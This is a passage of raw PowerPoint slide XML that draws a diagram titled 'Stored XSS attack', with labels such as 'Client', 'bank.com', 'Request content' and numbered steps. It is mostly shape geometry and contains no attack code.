                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65441" y="72554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100588" y="42464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142261" y="19289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187720" y="4898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233728" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279040" y="4099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322414" y="16702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362603" y="37315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398365" y="65441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428456" y="100588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451630" y="142261"/>
                </a:lnTo>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object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56BFC4-31A3-B249-80F1-02E448C32808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1260000">
            <a:off x="3201988" y="4240213"/>
            <a:ext cx="406400" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2725"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159766" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{106DF89F-F8E3-524A-A615-EE4B7C8983B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7312025" y="6151563"/>
            <a:ext cx="379413" cy="3635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67" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E85A6D7-F2CF-A248-8675-A1335517EFA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="320675" cy="3032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59768" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2DB1A7-1CBE-2140-A0F7-CCA1B96D8FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="322263" cy="303212"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 415290"/>
              <a:gd name="T1" fmla="*/ 0 h 379729"/>
              <a:gd name="T2" fmla="*/ 2020 w 415290"/>
              <a:gd name="T3" fmla="*/ 0 h 379729"/>
              <a:gd name="T4" fmla="*/ 2020 w 415290"/>
              <a:gd name="T5" fmla="*/ 3364 h 379729"/>
              <a:gd name="T6" fmla="*/ 0 w 415290"/>
              <a:gd name="T7" fmla="*/ 3364 h 379729"/>
              <a:gd name="T8" fmla="*/ 0 w 415290"/>
              <a:gd name="T9" fmla="*/ 0 h 379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290" h="379729">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415086" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415086" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A0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2" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D60455-CBCE-EF40-8043-34295C8835B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3775075" y="4381500"/>
            <a:ext cx="2847975" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2127"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2300" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="-63" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="24" baseline="-1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="3400" baseline="-1915" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159770" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D92BBEF8-A021-5A44-A606-FC5FE4161973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="365125" cy="376238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2125 w 471170"/>
              <a:gd name="T1" fmla="*/ 1221 h 471170"/>
              <a:gd name="T2" fmla="*/ 2197 w 471170"/>
              <a:gd name="T3" fmla="*/ 1622 h 471170"/>
              <a:gd name="T4" fmla="*/ 2225 w 471170"/>
              <a:gd name="T5" fmla="*/ 2029 h 471170"/>
              <a:gd name="T6" fmla="*/ 2210 w 471170"/>
              <a:gd name="T7" fmla="*/ 2432 h 471170"/>
              <a:gd name="T8" fmla="*/ 2155 w 471170"/>
              <a:gd name="T9" fmla="*/ 2819 h 471170"/>
              <a:gd name="T10" fmla="*/ 2061 w 471170"/>
              <a:gd name="T11" fmla="*/ 3179 h 471170"/>
              <a:gd name="T12" fmla="*/ 1932 w 471170"/>
              <a:gd name="T13" fmla="*/ 3502 h 471170"/>
              <a:gd name="T14" fmla="*/ 1769 w 471170"/>
              <a:gd name="T15" fmla="*/ 3774 h 471170"/>
              <a:gd name="T16" fmla="*/ 1575 w 471170"/>
              <a:gd name="T17" fmla="*/ 3989 h 471170"/>
              <a:gd name="T18" fmla="*/ 1361 w 471170"/>
              <a:gd name="T19" fmla="*/ 4124 h 471170"/>
              <a:gd name="T20" fmla="*/ 1144 w 471170"/>
              <a:gd name="T21" fmla="*/ 4175 h 471170"/>
              <a:gd name="T22" fmla="*/ 930 w 471170"/>
              <a:gd name="T23" fmla="*/ 4148 h 471170"/>
              <a:gd name="T24" fmla="*/ 724 w 471170"/>
              <a:gd name="T25" fmla="*/ 4044 h 471170"/>
              <a:gd name="T26" fmla="*/ 531 w 471170"/>
              <a:gd name="T27" fmla="*/ 3869 h 471170"/>
              <a:gd name="T28" fmla="*/ 360 w 471170"/>
              <a:gd name="T29" fmla="*/ 3626 h 471170"/>
              <a:gd name="T30" fmla="*/ 214 w 471170"/>
              <a:gd name="T31" fmla="*/ 3320 h 471170"/>
              <a:gd name="T32" fmla="*/ 100 w 471170"/>
              <a:gd name="T33" fmla="*/ 2955 h 471170"/>
              <a:gd name="T34" fmla="*/ 28 w 471170"/>
              <a:gd name="T35" fmla="*/ 2554 h 471170"/>
              <a:gd name="T36" fmla="*/ 0 w 471170"/>
              <a:gd name="T37" fmla="*/ 2147 h 471170"/>
              <a:gd name="T38" fmla="*/ 15 w 471170"/>
              <a:gd name="T39" fmla="*/ 1745 h 471170"/>
              <a:gd name="T40" fmla="*/ 71 w 471170"/>
              <a:gd name="T41" fmla="*/ 1357 h 471170"/>
              <a:gd name="T42" fmla="*/ 164 w 471170"/>
              <a:gd name="T43" fmla="*/ 997 h 471170"/>
              <a:gd name="T44" fmla="*/ 293 w 471170"/>
              <a:gd name="T45" fmla="*/ 675 h 471170"/>
              <a:gd name="T46" fmla="*/ 456 w 471170"/>
              <a:gd name="T47" fmla="*/ 401 h 471170"/>
              <a:gd name="T48" fmla="*/ 651 w 471170"/>
              <a:gd name="T49" fmla="*/ 188 h 471170"/>
              <a:gd name="T50" fmla="*/ 864 w 471170"/>
              <a:gd name="T51" fmla="*/ 52 h 471170"/>
              <a:gd name="T52" fmla="*/ 1080 w 471170"/>
              <a:gd name="T53" fmla="*/ 0 h 471170"/>
              <a:gd name="T54" fmla="*/ 1296 w 471170"/>
              <a:gd name="T55" fmla="*/ 28 h 471170"/>
              <a:gd name="T56" fmla="*/ 1502 w 471170"/>
              <a:gd name="T57" fmla="*/ 132 h 471170"/>
              <a:gd name="T58" fmla="*/ 1694 w 471170"/>
              <a:gd name="T59" fmla="*/ 307 h 471170"/>
              <a:gd name="T60" fmla="*/ 1866 w 471170"/>
              <a:gd name="T61" fmla="*/ 549 h 471170"/>
              <a:gd name="T62" fmla="*/ 2011 w 471170"/>
              <a:gd name="T63" fmla="*/ 856 h 471170"/>
              <a:gd name="T64" fmla="*/ 2125 w 471170"/>
              <a:gd name="T65" fmla="*/ 1221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49552" y="137685"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="464888" y="182834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470745" y="228730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467591" y="274118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455895" y="317745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436126" y="358355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408751" y="394696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374239" y="425513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333059" y="449552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287910" y="464888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242014" y="470745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196626" y="467591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152999" y="455895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112389" y="436126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76048" y="408751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45231" y="374239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21192" y="333059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5856" y="287910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="242014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3153" y="196626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14849" y="152999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34619" y="112389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61993" y="76048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96505" y="45231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137685" y="21193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182834" y="5856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274118" y="3153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317745" y="14849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358355" y="34619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394696" y="61993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425513" y="96505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449552" y="137685"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25399">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object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A401137-AF2F-8645-A46C-6F364AC1A96E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3430588" y="3730625"/>
            <a:ext cx="406400" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2730"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70351F0-03B6-9643-974C-367DDB2E1D8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754313" y="3719513"/>
            <a:ext cx="3776662" cy="1550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F92A7AD-6D1E-9343-8B5B-3F0C8083E70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2830513" y="4429125"/>
            <a:ext cx="3752850" cy="15509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59774" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{488E84C7-7BC5-0F4B-B19F-57AE9F6675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3" y="4953000"/>
            <a:ext cx="2184400" cy="201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object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011F3F7B-599A-C648-AD6A-DC0CF62D7E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159776" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E8A1F55-A9E6-044C-AACC-091774FE25E7}"/>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614E33E-B121-A648-959E-E6A0A58011AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1855788" y="80963"/>
            <a:ext cx="6338887" cy="769937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-24" dirty="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-353" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-12" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="55" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160771" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A175AB62-B7CA-174F-A411-6855171DDECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1287463" y="3395663"/>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72" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4A9DA9-D717-AF48-9D00-DA62DD3683AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>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73" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9115D25-4740-7A41-8858-D92FC064E16D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>
            <a:ext cx="1408113" cy="1517650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1821814"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T5" fmla="*/ 16095 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 1821814"/>
              <a:gd name="T7" fmla="*/ 16095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18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821218"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3C9095DC-C774-4E46-BA43-6E1E70B0A5E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="4017963"/>
            <a:ext cx="1009650" cy="292100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">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latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41252835-4024-AE4C-8B15-E87B111CEB32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="2874963"/>
            <a:ext cx="923925" cy="430212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160776" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AE785C-1B5D-1545-B6A1-0A742364FE47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="15986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77" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D62E0E1-0874-5E4C-A1BE-E18A084AD6B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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78" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD306319-1C6B-0240-BDCF-6637ECCAC6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="1519237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2176145"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T5" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 2176145"/>
              <a:gd name="T7" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T8" fmla="*/ 0 w 2176145"/>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6145" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2176145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217614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0779" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDF752A-76A5-4247-A36A-43B942C79134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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80" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAF4B966-747F-864F-A8BD-EA9F38871D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750" cy="1517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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ECAC1E0-1ED9-EB42-AC3C-26E0BCF3FA99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750" cy="941387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A06"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2487" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="178588">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
